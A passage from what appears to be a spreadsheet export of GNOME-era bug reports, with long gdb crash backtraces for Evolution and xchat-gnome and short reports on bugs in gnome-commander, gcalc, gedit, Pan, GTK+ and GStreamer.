#14 0x4007d62b in thread_dispatch (din=0x813b038) at e-msgport.c:538
#15 0x406b0bfd in pthread_start_thread (arg=0x42359c00) at manager.c:262
Thread 3 (Thread 1026 (LWP 30074)):
#0  0x409758a5 in __sigsuspend (set=0x4135975c)
    at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x406b30d9 in __pthread_wait_for_restart_signal (self=0x41359c00)
    at pthread.c:934
#2  0x406b4d79 in __pthread_alt_lock (lock=0x4008e790 self=0x0)
    at restart.h:34
#3  0x406b1c86 in __pthread_mutex_lock (mutex=0x4008e780) at mutex.c:120
#4  0x4005ff2c in camel_type_lock_up () at camel-object.c:115
#5  0x40060371 in camel_type_register (parent=26 
    name=0x4008a020 CamelTcpStreamRaw instance_size=28 classfuncs_size=52 
    class_init=0x40070cd0  class_finalize=0 
    instance_init=0x40070d80  
    instance_finalize=0x40070db4 )
    at camel-object.c:210
#6  0x40070e43 in camel_tcp_stream_raw_get_type () at camel-tcp-stream-raw.c:98
#7  0x40070e6d in camel_tcp_stream_raw_new () at camel-tcp-stream-raw.c:122
#8  0x400664bf in remote_connect (service=0x8146e38 ex=0x8149288)
    at camel-remote-store.c:244
#9  0x40043641 in disco_connect (service=0x8146e38 ex=0x8149288)
    at camel-disco-store.c:115
#10 0x4006b3e6 in camel_service_connect (service=0x8146e38 ex=0x8149288)
    at camel-service.c:243
#11 0x4006702b in camel_remote_store_connected (store=0x8146e38 ex=0x8149288)
    at camel-remote-store.c:586
#12 0x40b53df3 in get_folder_info_online (store=0x8146e38 top=0x0 flags=6 
    ex=0x8149288) at camel-imap-store.c:1204
#13 0x40043a38 in disco_get_folder_info (store=0x8146e38 top=0x0 flags=6 
    ex=0x8149288) at camel-disco-store.c:196
#14 0x4006dde0 in camel_store_get_folder_info (store=0x8146e38 top=0x0 
    flags=6 ex=0x8149288) at camel-store.c:534
#15 0x0808ed77 in get_folderinfo_get (mm=0x8149270) at mail-ops.c:1090
#16 0x0808c39b in mail_msg_received (e=0x813b0e0 msg=0x8149270 data=0x0)
    at mail-mt.c:334
#17 0x4007d4df in thread_received_msg (e=0x813b0e0 m=0x8149270)
    at e-msgport.c:467
#18 0x4007d62b in thread_dispatch (din=0x813b0e0) at e-msgport.c:538
#19 0x406b0bfd in pthread_start_thread (arg=0x41359c00) at manager.c:262
Thread 2 (Thread 2049 (LWP 30073)):
#0  0x40a27227 in __poll (fds=0x81620f4 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x406b0900 in __pthread_manager (arg=0x31) at manager.c:136
Thread 1 (Thread 1024 (LWP 30054)):
#0  0x40a02519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40a729e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406b5563 in waitpid (pid=30080 stat_loc=0xbfffe74c options=0)
    at wrapsyscall.c:172
#3  0x402e3262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x080951ca in segv_redirect (sig=11) at main.c:67
#5  0x406b3935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135544360 esi = 12 ebp = 3221220128 esp = 3221220116 ebx = 135544456 edx = 11 ecx = 12 eax = 4294967292 trapno = 0 err = 0 eip = 1084387879 cs = 35 __csh = 0 eflags = 534 esp_at_signal = 3221220116 ss = 43 __ssh = 0 fpstate = 0xbfffe898 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40a27227 in __poll (fds=0x8143e28 nfds=12 timeout=95)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40575a74 in g_main_poll (timeout=95 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40575465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40575725 in g_main_iteration (block=1) at gmain.c:907
#11 0x4048a89b in gtk_main_iteration () at gtkmain.c:603
#12 0x0808c1e6 in mail_msg_wait (msgid=9) at mail-mt.c:223
#13 0x4048be84 in gtk_marshal_NONE__POINTER_POINTER (object=0x814c7a0 
    func=0x808b17c  func_data=0x814c4c8 
    args=0xbfffed08) at gtkmarshal.c:340
#14 0x404bb56a in gtk_handlers_run (handlers=0x80eed50 signal=0xbfffeca8 
    object=0x814c7a0 params=0xbfffed08 after=0) at gtksignal.c:1917
#15 0x404ba9bb in gtk_signal_real_emit (object=0x814c7a0 signal_id=106 
    params=0xbfffed08) at gtksignal.c:1477
#16 0x404b8a30 in gtk_signal_emit (object=0x814c7a0 signal_id=106)
    at gtksignal.c:552
#17 0x406ea80d in impl_GNOME_Evolution_StorageListener_notifyFolderCreated (
    servant=0x814c7c8 path=0x81478ec /Vendors/WebCT folder=0xbfffeff8 
    ev=0xbffff068) at evolution-storage-listener.c:92
#18 0x406d4cc9 in _ORBIT_skel_GNOME_Evolution_StorageListener_notifyFolderCreated (_ORBIT_servant=0x814c7c8 _ORBIT_recv_buffer=0x813a6e8 ev=0xbffff068 
    _impl_notifyFolderCreated=0x406ea7bc ) at Evolution-skels.c:5064
#19 0x40814146 in ORBit_POA_handle_request (recv_buffer=0x813a6e8 
    poa=0x81325d8) at orbit_poa.c:507
#20 0x40817193 in ORBit_handle_incoming_request (recv_buffer=0x813a6e8)
    at server.c:90
#21 0x4081748b in ORBit_handle_incoming_message (recv_buffer=0x813a6e8)
    at server.c:160
#22 0x4083109e in giop_recv_reply_buffer_use_multiple_2 (
    request_cnx=0x813da48 request_ids=0xbffff170 block_for_reply=1)
    at giop-msg-buffer.c:1026
#23 0x4083115b in giop_recv_reply_buffer_use_2 (request_cnx=0x813da48 
    request_id=3221221784 block_for_reply=1) at giop-msg-buffer.c:1062
#24 0x406e11ed in GNOME_Evolution_Storage_addListener (_obj=0x8149200 
    listener=0x814b578 ev=0xbffff1d8) at Evolution-stubs.c:7532
#25 0x0808b535 in mail_local_storage_startup (shellclient=0x813d9f0 
    evolution_path=0x813db18 /home/mgrte/evolution) at mail-local.c:699
#26 0x0806c261 in owner_set_cb (shell_component=0x813c928 
    shell_client=0x813d9f0 
    evolution_homedir=0x813d874 /home/mgrte/evolution user_data=0x0)
    at component-factory.c:626
#27 0x4048be84 in gtk_marshal_NONE__POINTER_POINTER (object=0x813c928 
    func=0x806c1e0  func_data=0x0 args=0xbffff318)
    at gtkmarshal.c:340
#28 0x404bb56a in gtk_handlers_run (handlers=0x80eef70 signal=0xbffff2b8 
    object=0x813c928 params=0xbffff318 after=0) at gtksignal.c:1917
#29 0x404ba9bb in gtk_signal_real_emit (object=0x813c928 signal_id=97 
    params=0xbffff318) at gtksignal.c:1477
#30 0x404b8a30 in gtk_signal_emit (object=0x813c928 signal_id=97)
    at gtksignal.c:552
#31 0x406e8878 in impl_setOwner (servant=0x813c984 shell=0x813d248 
    evolution_homedir=0x813d874 /home/mgrte/evolution ev=0xbffff658)
    at evolution-shell-component.c:312
#32 0x406d207d in _ORBIT_skel_GNOME_Evolution_ShellComponent_setOwner (
    _ORBIT_servant=0x813c984 _ORBIT_recv_buffer=0x813a688 ev=0xbffff658 
    _impl_setOwner=0x406e87cc ) at Evolution-skels.c:1161
#33 0x40814146 in ORBit_POA_handle_request (recv_buffer=0x813a688 
    poa=0x81325d8) at orbit_poa.c:507
#34 0x40817193 in ORBit_handle_incoming_request (recv_buffer=0x813a688)
    at server.c:90
#35 0x4081748b in ORBit_handle_incoming_message (recv_buffer=0x813a688)
    at server.c:160
#36 0x4082fce4 in giop_main_handle_connection (connection=0x813d708)
    at connection.c:1211
#37 0x407d5955 in orb_handle_connection (source=0x813c018 cond=G_IO_IN 
    cnx=0x813d708) at oaf-mainloop.c:69
#38 0x40573a7a in g_io_unix_dispatch (source_data=0x813c030 
    current_time=0xbffff7f8 user_data=0x813d708) at giounix.c:137
#39 0x40575055 in g_main_dispatch (dispatch_time=0xbffff7f8) at gmain.c:656
#40 0x40575659 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#41 0x405757e8 in g_main_run (loop=0x813a9b0) at gmain.c:935
#42 0x4048a65b in gtk_main () at gtkmain.c:524
#43 0x407a7547 in bonobo_main () at bonobo-main.c:283
#44 0x08095379 in main (argc=3 argv=0xbffffa1c) at main.c:141
#45 0x40964177 in __libc_start_main (main=0x80951f4  argc=3 
    ubp_av=0xbffffa1c init=0x8064a10  fini=0x80c819c  
    rtld_fini=0x4000e184  stack_end=0xbffffa14)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40a02519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40a02519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40a729e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406b5563 in waitpid (pid=30080 stat_loc=0xbfffe74c options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbfffe74c
options = 0
result = 0
oldtype = 0
#3  0x402e3262 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = -5054731
in_segv = 1
pid = 0
#4  0x080951ca in segv_redirect (sig=11) at main.c:67
	in main.c
sig = 11
#5  0x406b3935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 135544360 esi = 12 ebp = 3221220128 esp = 3221220116 ebx = 135544456 edx = 11 ecx = 12 eax = 4294967292 trapno = 0 err = 0 eip = 1084387879 cs = 35 __csh = 0 eflags = 534 esp_at_signal = 3221220116 ss = 43 __ssh = 0 fpstate = 0xbfffe898 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
signo = 0
__value = 0x80951a8 U\211Ã¥SP\213]\bÃ¨3%Ã½Ã¿\213\0250#\016\b9Ãu\025\203Ã¬\fSÂ¡\b\035\016\bÃ¿Ã\203Ã„\020\213]Ã¼Ã‰Ãƒ\211Ã¶\203Ã¬\bSRÃ¨ÃŠ\rÃ½Ã¿\203Ã„\020Ã‡E\b
#6  
No locals.
#7  0x40a27227 in __poll (fds=0x8143e28 nfds=12 timeout=95)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x8143e28
nfds = 3221219148
timeout = 0
resultvar = 135544360
Unknown reporter: Richard.Eames@flinders.edu.au changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>Richard.Eames</t>
  </si>
  <si>
    <t>GNOME-COMMANDER-388970</t>
  </si>
  <si>
    <t>GNOME-COMMANDER</t>
  </si>
  <si>
    <t>When creating a new textfile the file-path is not escaped</t>
  </si>
  <si>
    <t>Please describe the problem:
When creating a new textfile over the context menu. It seems like the file-path is not escaped when sending to gedit.
If you have spaces in the path it creates 2 files.
Steps to reproduce:
1. create new textfile over context menu
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>epiotr</t>
  </si>
  <si>
    <t>rmails</t>
  </si>
  <si>
    <t>GNOME-UTILS-79727</t>
  </si>
  <si>
    <t>gcalc</t>
  </si>
  <si>
    <t>click on button RAD will enlarge the gcalc window horizontally</t>
  </si>
  <si>
    <t>1. launch gcalc
2. click the DEG button then the RAD button(the same button)
3. when the RAD button becomes GRAD the gcalc window will be enlarged
   horizontally.
a little anonnying I won't expect window to resize unrequested in this
application.
I think the window should be enlarged at first to fit the GRAD button.</t>
  </si>
  <si>
    <t>carton</t>
  </si>
  <si>
    <t>GNOME-APPLETS-56999</t>
  </si>
  <si>
    <t>Applet flicker when added to small panel</t>
  </si>
  <si>
    <t>If the applet is added to a small (&lt;48 pixel) panel there is a visible
flicker. This is due to the default assuming it is being added to a 48
pixel panel then receiving the change pixel size signal. I will attach a
patch which resolves this problem.</t>
  </si>
  <si>
    <t>r_kinder</t>
  </si>
  <si>
    <t>GSTREAMER-430228</t>
  </si>
  <si>
    <t>[sunaudio] copyright bug</t>
  </si>
  <si>
    <t>The copyright info in sunaudio plugin code isn't quite right.  It should include 2006 for all the plugins since we made many changes in 2006.  Also in gstsunaudiosrc.c the plugin attributed Wim Taymans and Erik Walthinsen which was a copy-paste error.  They weren't involved with writing this code at all.  
Also remove David Schleef from gstsunaudiosrc.h - he wasn't involved with writing this plugin at all.  He only wrote the original sink plugin.  Note he wasn't ever mentioned in the gstsunaudiosrc.c file at all.
Also clean up the comments at the top of each file so they are a bit more consistant.</t>
  </si>
  <si>
    <t>GTK+-421985</t>
  </si>
  <si>
    <t>_gtk_print_operation_platform_backend_launch_preview</t>
  </si>
  <si>
    <t>(see also bug 421274.)
If _gtk_print_operation_platform_backend_launch_preview (in gtkprintoperation-unix.c) fails to launch the previewer it will leave the
temporary file around.  It should not.
Also it should not use gtk_settings_get_default because that is not
multihead safe.  It should use gtk_settings_get_for_screen which should
be easy considering that it is finding the right screen anyway.
Why is the error dialog modal btw.?  Is that failure really important
enough to grab focus away from whatever the user is doing at the time?</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-116705</t>
  </si>
  <si>
    <t>[obsolete] fonts:///</t>
  </si>
  <si>
    <t>Compilation error in font-view.c because Xlib.h not included</t>
  </si>
  <si>
    <t>On Solaris with the Forte 7 compiler I get a compilation error in
vfs-methods/fontilus/font-view.c because 'Bool' is not defined before being
references in X11/Xft/Xft.h.
This is defined in X11/Xlib.h.
I have a patch to add this header file.</t>
  </si>
  <si>
    <t>PAN-92645</t>
  </si>
  <si>
    <t>Server -&gt; Select Server shows Folders</t>
  </si>
  <si>
    <t>Since a few days Pan has the following bad behavior: I have 4 different
news servers which all are shown in the Server -&gt; Select Server submenu.
When I select one of the 3rd or 4th it automagically selects the 3rd but
shows the folders list. No way to get the subscribed or all groups for
the real servers.
Today I tried a bit around and found out when this happens and I select the
Get List of all Groups... menu item a task is generated which tries to
query the group list from the server named folders. Strange.
The odd thing is that this only happens approximately each 2nd restart of Pan.</t>
  </si>
  <si>
    <t>GEDIT-114451</t>
  </si>
  <si>
    <t>Search-&gt;Find Next sensitivity gets set semi-arbitrarily</t>
  </si>
  <si>
    <t>I have found a little bug in my old code: open a new document. 
Search-&gt;Find Next should be insensitive. Open the Find dialog.  Search for
a text. Close the dialog. Search-&gt;Find Next is still insensitive. It should
be sensitive.
I have no idea which even to set this update as occuring on.  Currently
the set_active_window_verbs_sensitivity call (among others) is included via
function call in child_state_changed_handler and view_changed_handler. 
This isn't quite sufficient and I'm actually wondering if might be better
solved by adding a new MDIChild event (we have two namely state_changed
and undo_redo_state_changed but I wonder if we could add
find_state_changed or something equivalent).
The reason why I'm leaning in this direction is because Undo/Redo works
this way.  Of course Undo/Redo is not related to Search so the final call
is up to whoever knows better.  I'll be looking into this in the meantime.</t>
  </si>
  <si>
    <t>XCHAT-GNOME-420917</t>
  </si>
  <si>
    <t>xchat-gnome crashed with SIGSEGV in server_disconnect()</t>
  </si>
  <si>
    <t>The bug has been opened on https://launchpad.net/bugs/94341
Binary package hint: xchat-gnome
Attempting to press ok in a dialouge box and nothing would happen. After several attempts at clicking xchat crashed.
ProblemType: Crash
Architecture: i386
Date: Wed Mar 21 17:51:51 2007
DistroRelease: Ubuntu 7.04
ExecutablePath: /usr/bin/xchat-gnome
Package: xchat-gnome 1:0.16-0ubuntu3
...
.
Thread 1 (process 23501):
#0  0x0809a1a0 in server_disconnect (sess=0x8579880 sendquit=1 err=-1) at server.c:1106
	serv = (server *) 0x1
	list = 
	tbuf = \037g \004\210qÃ‡Â¿Ã¸\237W\b\000\000\000\000\f\000\000\0000\036HÂ·Ã°\237W\bÃ´Ã¿gÂ· \021hÂ·Ã¸\237W\bÃˆqÃ‡Â¿Ã´Ã¿gÂ· \021hÂ·XÃ¼&lt;\bÃ˜qÃ‡Â¿\020ÃžZÂ·
	shutup = 
#1  0x0809a657 in server_connect (serv=0x836f7e0 hostname=0x810d4c0 irc.freenode.net port=-1 no_login=0) at server.c:1646
	pid = 
	read_des = 
	sess = (session *) 0x8579880
#2  0x0809e0d9 in servlist_connect (sess=0x833f5e8 net=0x810d460 join=1) at servlist.c:570
	ircserv = (ircserver *) 0x810d4b0
	list = 
	port = 0x0
	serv = (server *) 0x836f7e0
#3  0x0805ffbc in dialog_response (dialog=0x83dd810 response=-5 data=0x0) at connect-dialog.c:96
	s = (session *) 0x833f5e8
	net = (ircnet *) 0x1
	found = -1077446540
	model = (GtkTreeModel *) 0x8399f40
	iter = {stamp = 2131822400 user_data = 0x8476e60 user_data2 = 0x0 user_data3 = 0x0}
	select = 
#4  0xb7733729 in IA__g_cclosure_marshal_VOID__INT (closure=0x8353668 return_value=0x0 n_param_values=2 param_values=0xbfc77adc invocation_hint=0xbfc779ec 
    marshal_data=0x805fea0) at gmarshal.c:216
	data1 = (gpointer) 0x83dd810
	data2 = 
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__INT
#5  0xb772662b in IA__g_closure_invoke (closure=0x8353668 return_value=0x0 n_param_values=2 param_values=0xbfc77adc invocation_hint=0xbfc779ec) at gclosure.c:490
	marshal = (GClosureMarshal) 0xb77336d0 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#6  0xb7737103 in signal_emit_unlocked_R (node=0x822e948 detail=0 instance=0x83dd810 emission_return=0x0 instance_and_params=0xbfc77adc) at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x8397aa0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbfc77ea4 instance = 0x83dd810 ihint = {signal_id = 172 detail = 0 run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x812f810
	handler_list = (Handler *) 0x8397aa0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
      v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 172
	max_sequential_handler_number = 4457
	return_value_altered = 0
#7  0xb7738627 in IA__g_signal_emit_valist (instance=0x83dd810 signal_id=172 detail=0 var_args=0xbfc77d20 \020Ã˜=\bÃÃ¿\005\bX}Ã‡Â¿) at gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = 0 v_long = 0 v_int64 = 0 v_double = 0 v_pointer = 0x0} {v_int = 1 v_long = 1 v_int64 = 1 v_double = 4.9406564584124654e-324 
    v_pointer = 0x1} {v_int = 1 v_long = 1 v_int64 = 1 v_double = 4.9406564584124654e-324 v_pointer = 0x1} {v_int = -1077445472 v_long = -1077445472 v_int64 = 3217521824 
    v_double = 1.5896669979828656e-314 v_pointer = 0xbfc77ca0} {v_int = 72 v_long = 72 v_int64 = 8796093022280 v_double = 4.3458473799324504e-311 v_pointer = 0x48} {
    v_int = -1077445436 v_long = -1077445436 v_int64 = -4627592890447070012 v_double = -0.18349561084958144 v_pointer = 0xbfc77cc4} {v_int = -1216767866 
    v_long = -1216767866 v_int64 = 580335777955289222 v_double = 7.0431489644367852e-270 v_pointer = 0xb7799886} {v_int = -1077445376 v_long = -1077445376 
    v_int64 = -5188543828649870080 v_double = -5.6183793727826522e-39 v_pointer = 0xbfc77d00}}
	_lcopy_format = 
	_n_values = 
	return_value = {g_type = 3081722391 data = {{v_int = -1211466836 v_uint = 3083500460 v_long = -1211466836 v_ulong = 3083500460 v_int64 = -5203210437725094996 
      v_uint64 = 13243533635984456620 v_float = -2.41378657e-05 v_double = -6.0802225388181541e-40 v_pointer = 0xb7ca7bac} {v_int = -1077445416 v_uint = 3217521880 
      v_long = -1077445416 v_ulong = 3217521880 v_int64 = -5210848706214527784 v_uint64 = 13235895367495023832 v_float = -1.55849743 v_double = -1.7992021984309843e-40 
      v_pointer = 0xbfc77cd8}}}
	error = 
	instance_and_params = (GValue *) 0xbfc77adc
	stack_values = {{g_type = 139746104 data = {{v_int = 138270736 v_uint = 138270736 v_long = 138270736 v_ulong = 138270736 v_int64 = 138270736 v_uint64 = 138270736 
        v_float = 5.71290989e-34 v_double = 6.8314820482784499e-316 v_pointer = 0x83dd810} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 24 data = {{v_int = -5 v_uint = 4294967291 v_long = -5 v_ulong = 4294967291 v_int64 = 4294967291 
        v_uint64 = 4294967291 v_float = -nan(0x7ffffb) v_double = 2.1219957884949441e-314 v_pointer = 0xfffffffb} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 10 data = {{v_int = -1077444654 v_uint = 3217522642 v_long = -1077444654 
        v_ulong = 3217522642 v_int64 = 3217522642 v_uint64 = 3217522642 v_float = -1.55858827 v_double = 1.5896674021285639e-314 v_pointer = 0xbfc77fd2} {v_int = 0 
        v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
        v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 
        v_float = 0 v_double = 0 v_pointer = 0x0}}} {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = -5231328852961132544 
        v_uint64 = 13215415220748419072 v_float = 0 v_double = -8.1024828830341329e-42 v_pointer = 0x0} {v_int = -1217916640 v_uint = 3077050656 v_long = -1217916640 
        v_ulong = 3077050656 v_int64 = 592873199808024864 v_uint64 = 592873199808024864 v_float = -1.38322648e-05 v_double = 4.9799354719112953e-269 
        v_pointer = 0xb7681120}}} {g_type = 134555090 data = {{v_int = -1077445676 v_uint = 3217521620 v_long = -1077445676 v_ulong = 3217521620 
        v_int64 = -5217802588979233836 v_uint64 = 13228941484730317780 v_float = -1.55846643 v_double = -6.4977541946678672e-41 v_pointer = 0xbfc77bd4} {v_int = -1077445756 
        v_uint = 3217521540 v_long = -1077445756 v_ulong = 3217521540 v_int64 = -5188854762807264380 v_uint64 = 13257889310902287236 v_float = -1.5584569 
        v_double = -5.415485368132814e-39 v_pointer = 0xbfc77b84}}} {g_type = 3080188621 data = {{v_int = 134555070 v_uint = 134555070 v_long = 134555070 
        v_ulong = 134555070 v_int64 = 593786856668472766 v_uint64 = 593786856668472766 v_float = 4.00675974e-34 v_double = 5.5943581158227129e-269 v_pointer = 0x80525be} {
        v_int = -1077445736 v_uint = 3217521560 v_long = -1077445736 v_ulong = 3217521560 v_int64 = 3217521560 v_uint64 = 3217521560 v_float = -1.55845928 
        v_double = 1.5896668675495351e-314 v_pointer = 0xbfc77b98}}} {g_type = 3077050656 data = {{v_int = -1209781167 v_uint = 3085186129 v_long = -1209781167 
        v_ulong = 3085186129 v_int64 = 592873199816160337 v_uint64 = 592873199816160337 v_float = -2.72040797e-05 v_double = 4.9799354773822976e-269 v_pointer = 0xb7e43451} 
      {v_int = -1217921036 v_uint = 3077046260 v_long = -1217921036 v_ulong = 3077046260 v_int64 = -5188551439472394252 v_uint64 = 13258192634237157364 
        v_float = -1.38282667e-05 v_double = -5.6134130793604399e-39 v_pointer = 0xb767fff4}}} {g_type = 137674556 data = {{v_int = 13 v_uint = 13 v_long = 13 
        v_ulong = 13 v_int64 = -4627593718298312691 v_uint64 = 13819150355411238925 v_float = 1.821688e-44 v_double = -0.18347263336181677 v_pointer = 0xd} {
        v_int = -1208123582 v_uint = 3086843714 v_long = -1208123582 v_ulong = 3086843714 v_int64 = 592619178272063298 v_uint64 = 592619178272063298 
        v_float = -3.02192093e-05 v_double = 4.8091092126311634e-269 v_pointer = 0xb7fd7f42}}} {g_type = 3074956848 data = {{v_int = 137979904 v_uint = 137979904 
        v_long = 137979904 v_ulong = 137979904 v_int64 = -4627594061757716480 v_uint64 = 13819150011951835136 v_float = 5.57936639e-34 v_double = -0.183463100448364 
        v_pointer = 0x8396800} {v_int = 1065 v_uint = 1065 v_long = 1065 v_ulong = 1065 v_int64 = 165523744621609 v_uint64 = 165523744621609 v_float = 1.49238286e-42 
        v_double = 8.177959578853681e-310 v_pointer = 0x429}}} {g_type = 3217521620 data = {{v_int = -1077445676 v_uint = 3217521620 v_long = -1077445676 
        v_ulong = 3217521620 v_int64 = -4627592907626939436 v_uint64 = 13819151166082612180 v_float = -1.55846643 v_double = -0.18349513401241657 v_pointer = 0xbfc77bd4} {
        v_int = 1262872392 v_uint = 1262872392 v_long = 1262872392 v_ulong = 1262872392 v_int64 = -5195681757012826296 v_uint64 = 13251062316696725320 v_float = 12969800 
        v_double = -1.949699832966606e-39 v_pointer = 0x4b45e748}}} {g_type = 90 data = {{v_int = -1214892848 v_uint = 3080074448 v_long = -1214892848 v_ulong = 3080074448 
        v_int64 = -5217987169631193904 v_uint64 = 13228756904078357712 v_float = -1.79059862e-05 v_double = -6.3095596707708184e-41 v_pointer = 0xb79634d0} {v_int = 14976 
        v_uint = 14976 v_long = 14976 v_ulong = 14976 v_int64 = 5423995622661307008 v_uint64 = 5423995622661307008 v_float = 2.09858458e-41 
        v_double = 4.1958659726693266e+54 v_pointer = 0x3a80}}} {g_type = 0 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 v_int64 = 1 v_uint64 = 1 
        v_float = 1.40129846e-45 v_double = 4.9406564584124654e-324 v_pointer = 0x1} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 4294967296 
        v_uint64 = 4294967296 v_float = 0 v_double = 2.1219957909652723e-314 v_pointer = 0x0}}} {g_type = 1782 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
        v_int64 = -5195681758275698688 v_uint64 = 13251062315433852928 v_float = 0 v_double = -1.9496994209352629e-39 v_pointer = 0x0} {v_int = 134555070 
        v_uint = 134555070 v_long = 134555070 v_ulong = 134555070 v_int64 = -5217554102434323010 v_uint64 = 13229189971275228606 v_float = 4.00675974e-34 
        v_double = -6.7511058136903874e-41 v_pointer = 0x80525be}}} {g_type = 134528884 data = {{v_int = 1 v_uint = 1 v_long = 1 v_ulong = 1 
        v_int64 = -5188551442549440511 v_uint64 = 13258192631160111105 v_float = 1.40129846e-45 v_double = -5.6134110714940697e-39 v_pointer = 0x1} {v_int = -1208051560 
        v_uint = 3086915736 v_long = -1208051560 v_ulong = 3086915736 v_int64 = -4627592959297152872 v_uint64 = 13819151114412398744 v_float = -3.03502165e-05 
        v_double = -0.18349369987590047 v_pointer = 0xb7fe9898}}} {g_type = 3217521876 data = {{v_int = -1208123133 v_uint = 3086844163 v_long = -1208123133 
        v_ulong = 3086844163 v_int64 = 577797160234221827 v_uint64 = 577797160234221827 v_float = -3.0220026e-05 v_double = 4.9091637129962805e-270 v_pointer = 0xb7fd8103} {
        v_int = -1077445448 v_uint = 3217521848 v_long = -1077445448 v_ulong = 3217521848 v_int64 = -5188542334001251144 v_uint64 = 13258201739708300472 
        v_float = -1.55849361 v_double = -5.6193546765137753e-39 v_pointer = 0xbfc77cb8}}}}
	free_me = (GValue *) 0x0
	signal_return_type = 4
	param_values = (GValue *) 0xbfc77af0
	node = (SignalNode *) 0x822e948
	i = 1
	n_params = 1
	__PRETTY_FUNCTION__ = IA__g_signal_emit_valist
#8  0xb77387e9 in IA__g_signal_emit (instance=0x83dd810 signal_id=172 detail=0) at gsignal.c:2243
	var_args = 0xbfc77d1c Ã»Ã¿Ã¿Ã¿\020Ã˜=\bÃÃ¿\005\bX}Ã‡Â¿
#9  0xb7a1313a in IA__gtk_dialog_response (dialog=0x83dd810 response_id=-5) at gtkdialog.c:835
	__PRETTY_FUNCTION__ = IA__gtk_dialog_response
#10 0x0806002c in row_activated (widget=0x83a11c8 path=0x8559290 column=0x82eb330 dialog=0x83dd810) at connect-dialog.c:111
	iter = {stamp = 2131822400 user_data = 0x8476e60 user_data2 = 0x0 user_data3 = 0x0}
#11 0xb7a95bfd in _gtk_marshal_VOID__BOXED_OBJECT (closure=0x8474f98 return_value=0x0 n_param_values=3 param_values=0xbfc77f9c invocation_hint=0xbfc77eac 
    marshal_data=0x805ffd0) at gtkmarshalers.c:1422
	data1 = (gpointer) 0x83a11c8
	data2 = 
	__PRETTY_FUNCTION__ = _gtk_marshal_VOID__BOXED_OBJECT
#12 0xb772662b in IA__g_closure_invoke (closure=0x8474f98 return_value=0x0 n_param_values=3 param_values=0xbfc77f9c invocation_hint=0xbfc77eac) at gclosure.c:490
	marshal = (GClosureMarshal) 0xb7a95ba0 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#13 0xb7737103 in signal_emit_unlocked_R (node=0x82e83d8 detail=0 instance=0x83a11c8 emission_return=0x0 instance_and_params=0xbfc77f9c) at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x8320c20
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0xbfc78434 instance = 0x83a11c8 ihint = {signal_id = 215 detail = 0 run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x82e8388
	handler_list = (Handler *) 0x8320c20
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0} {v_int = 0 
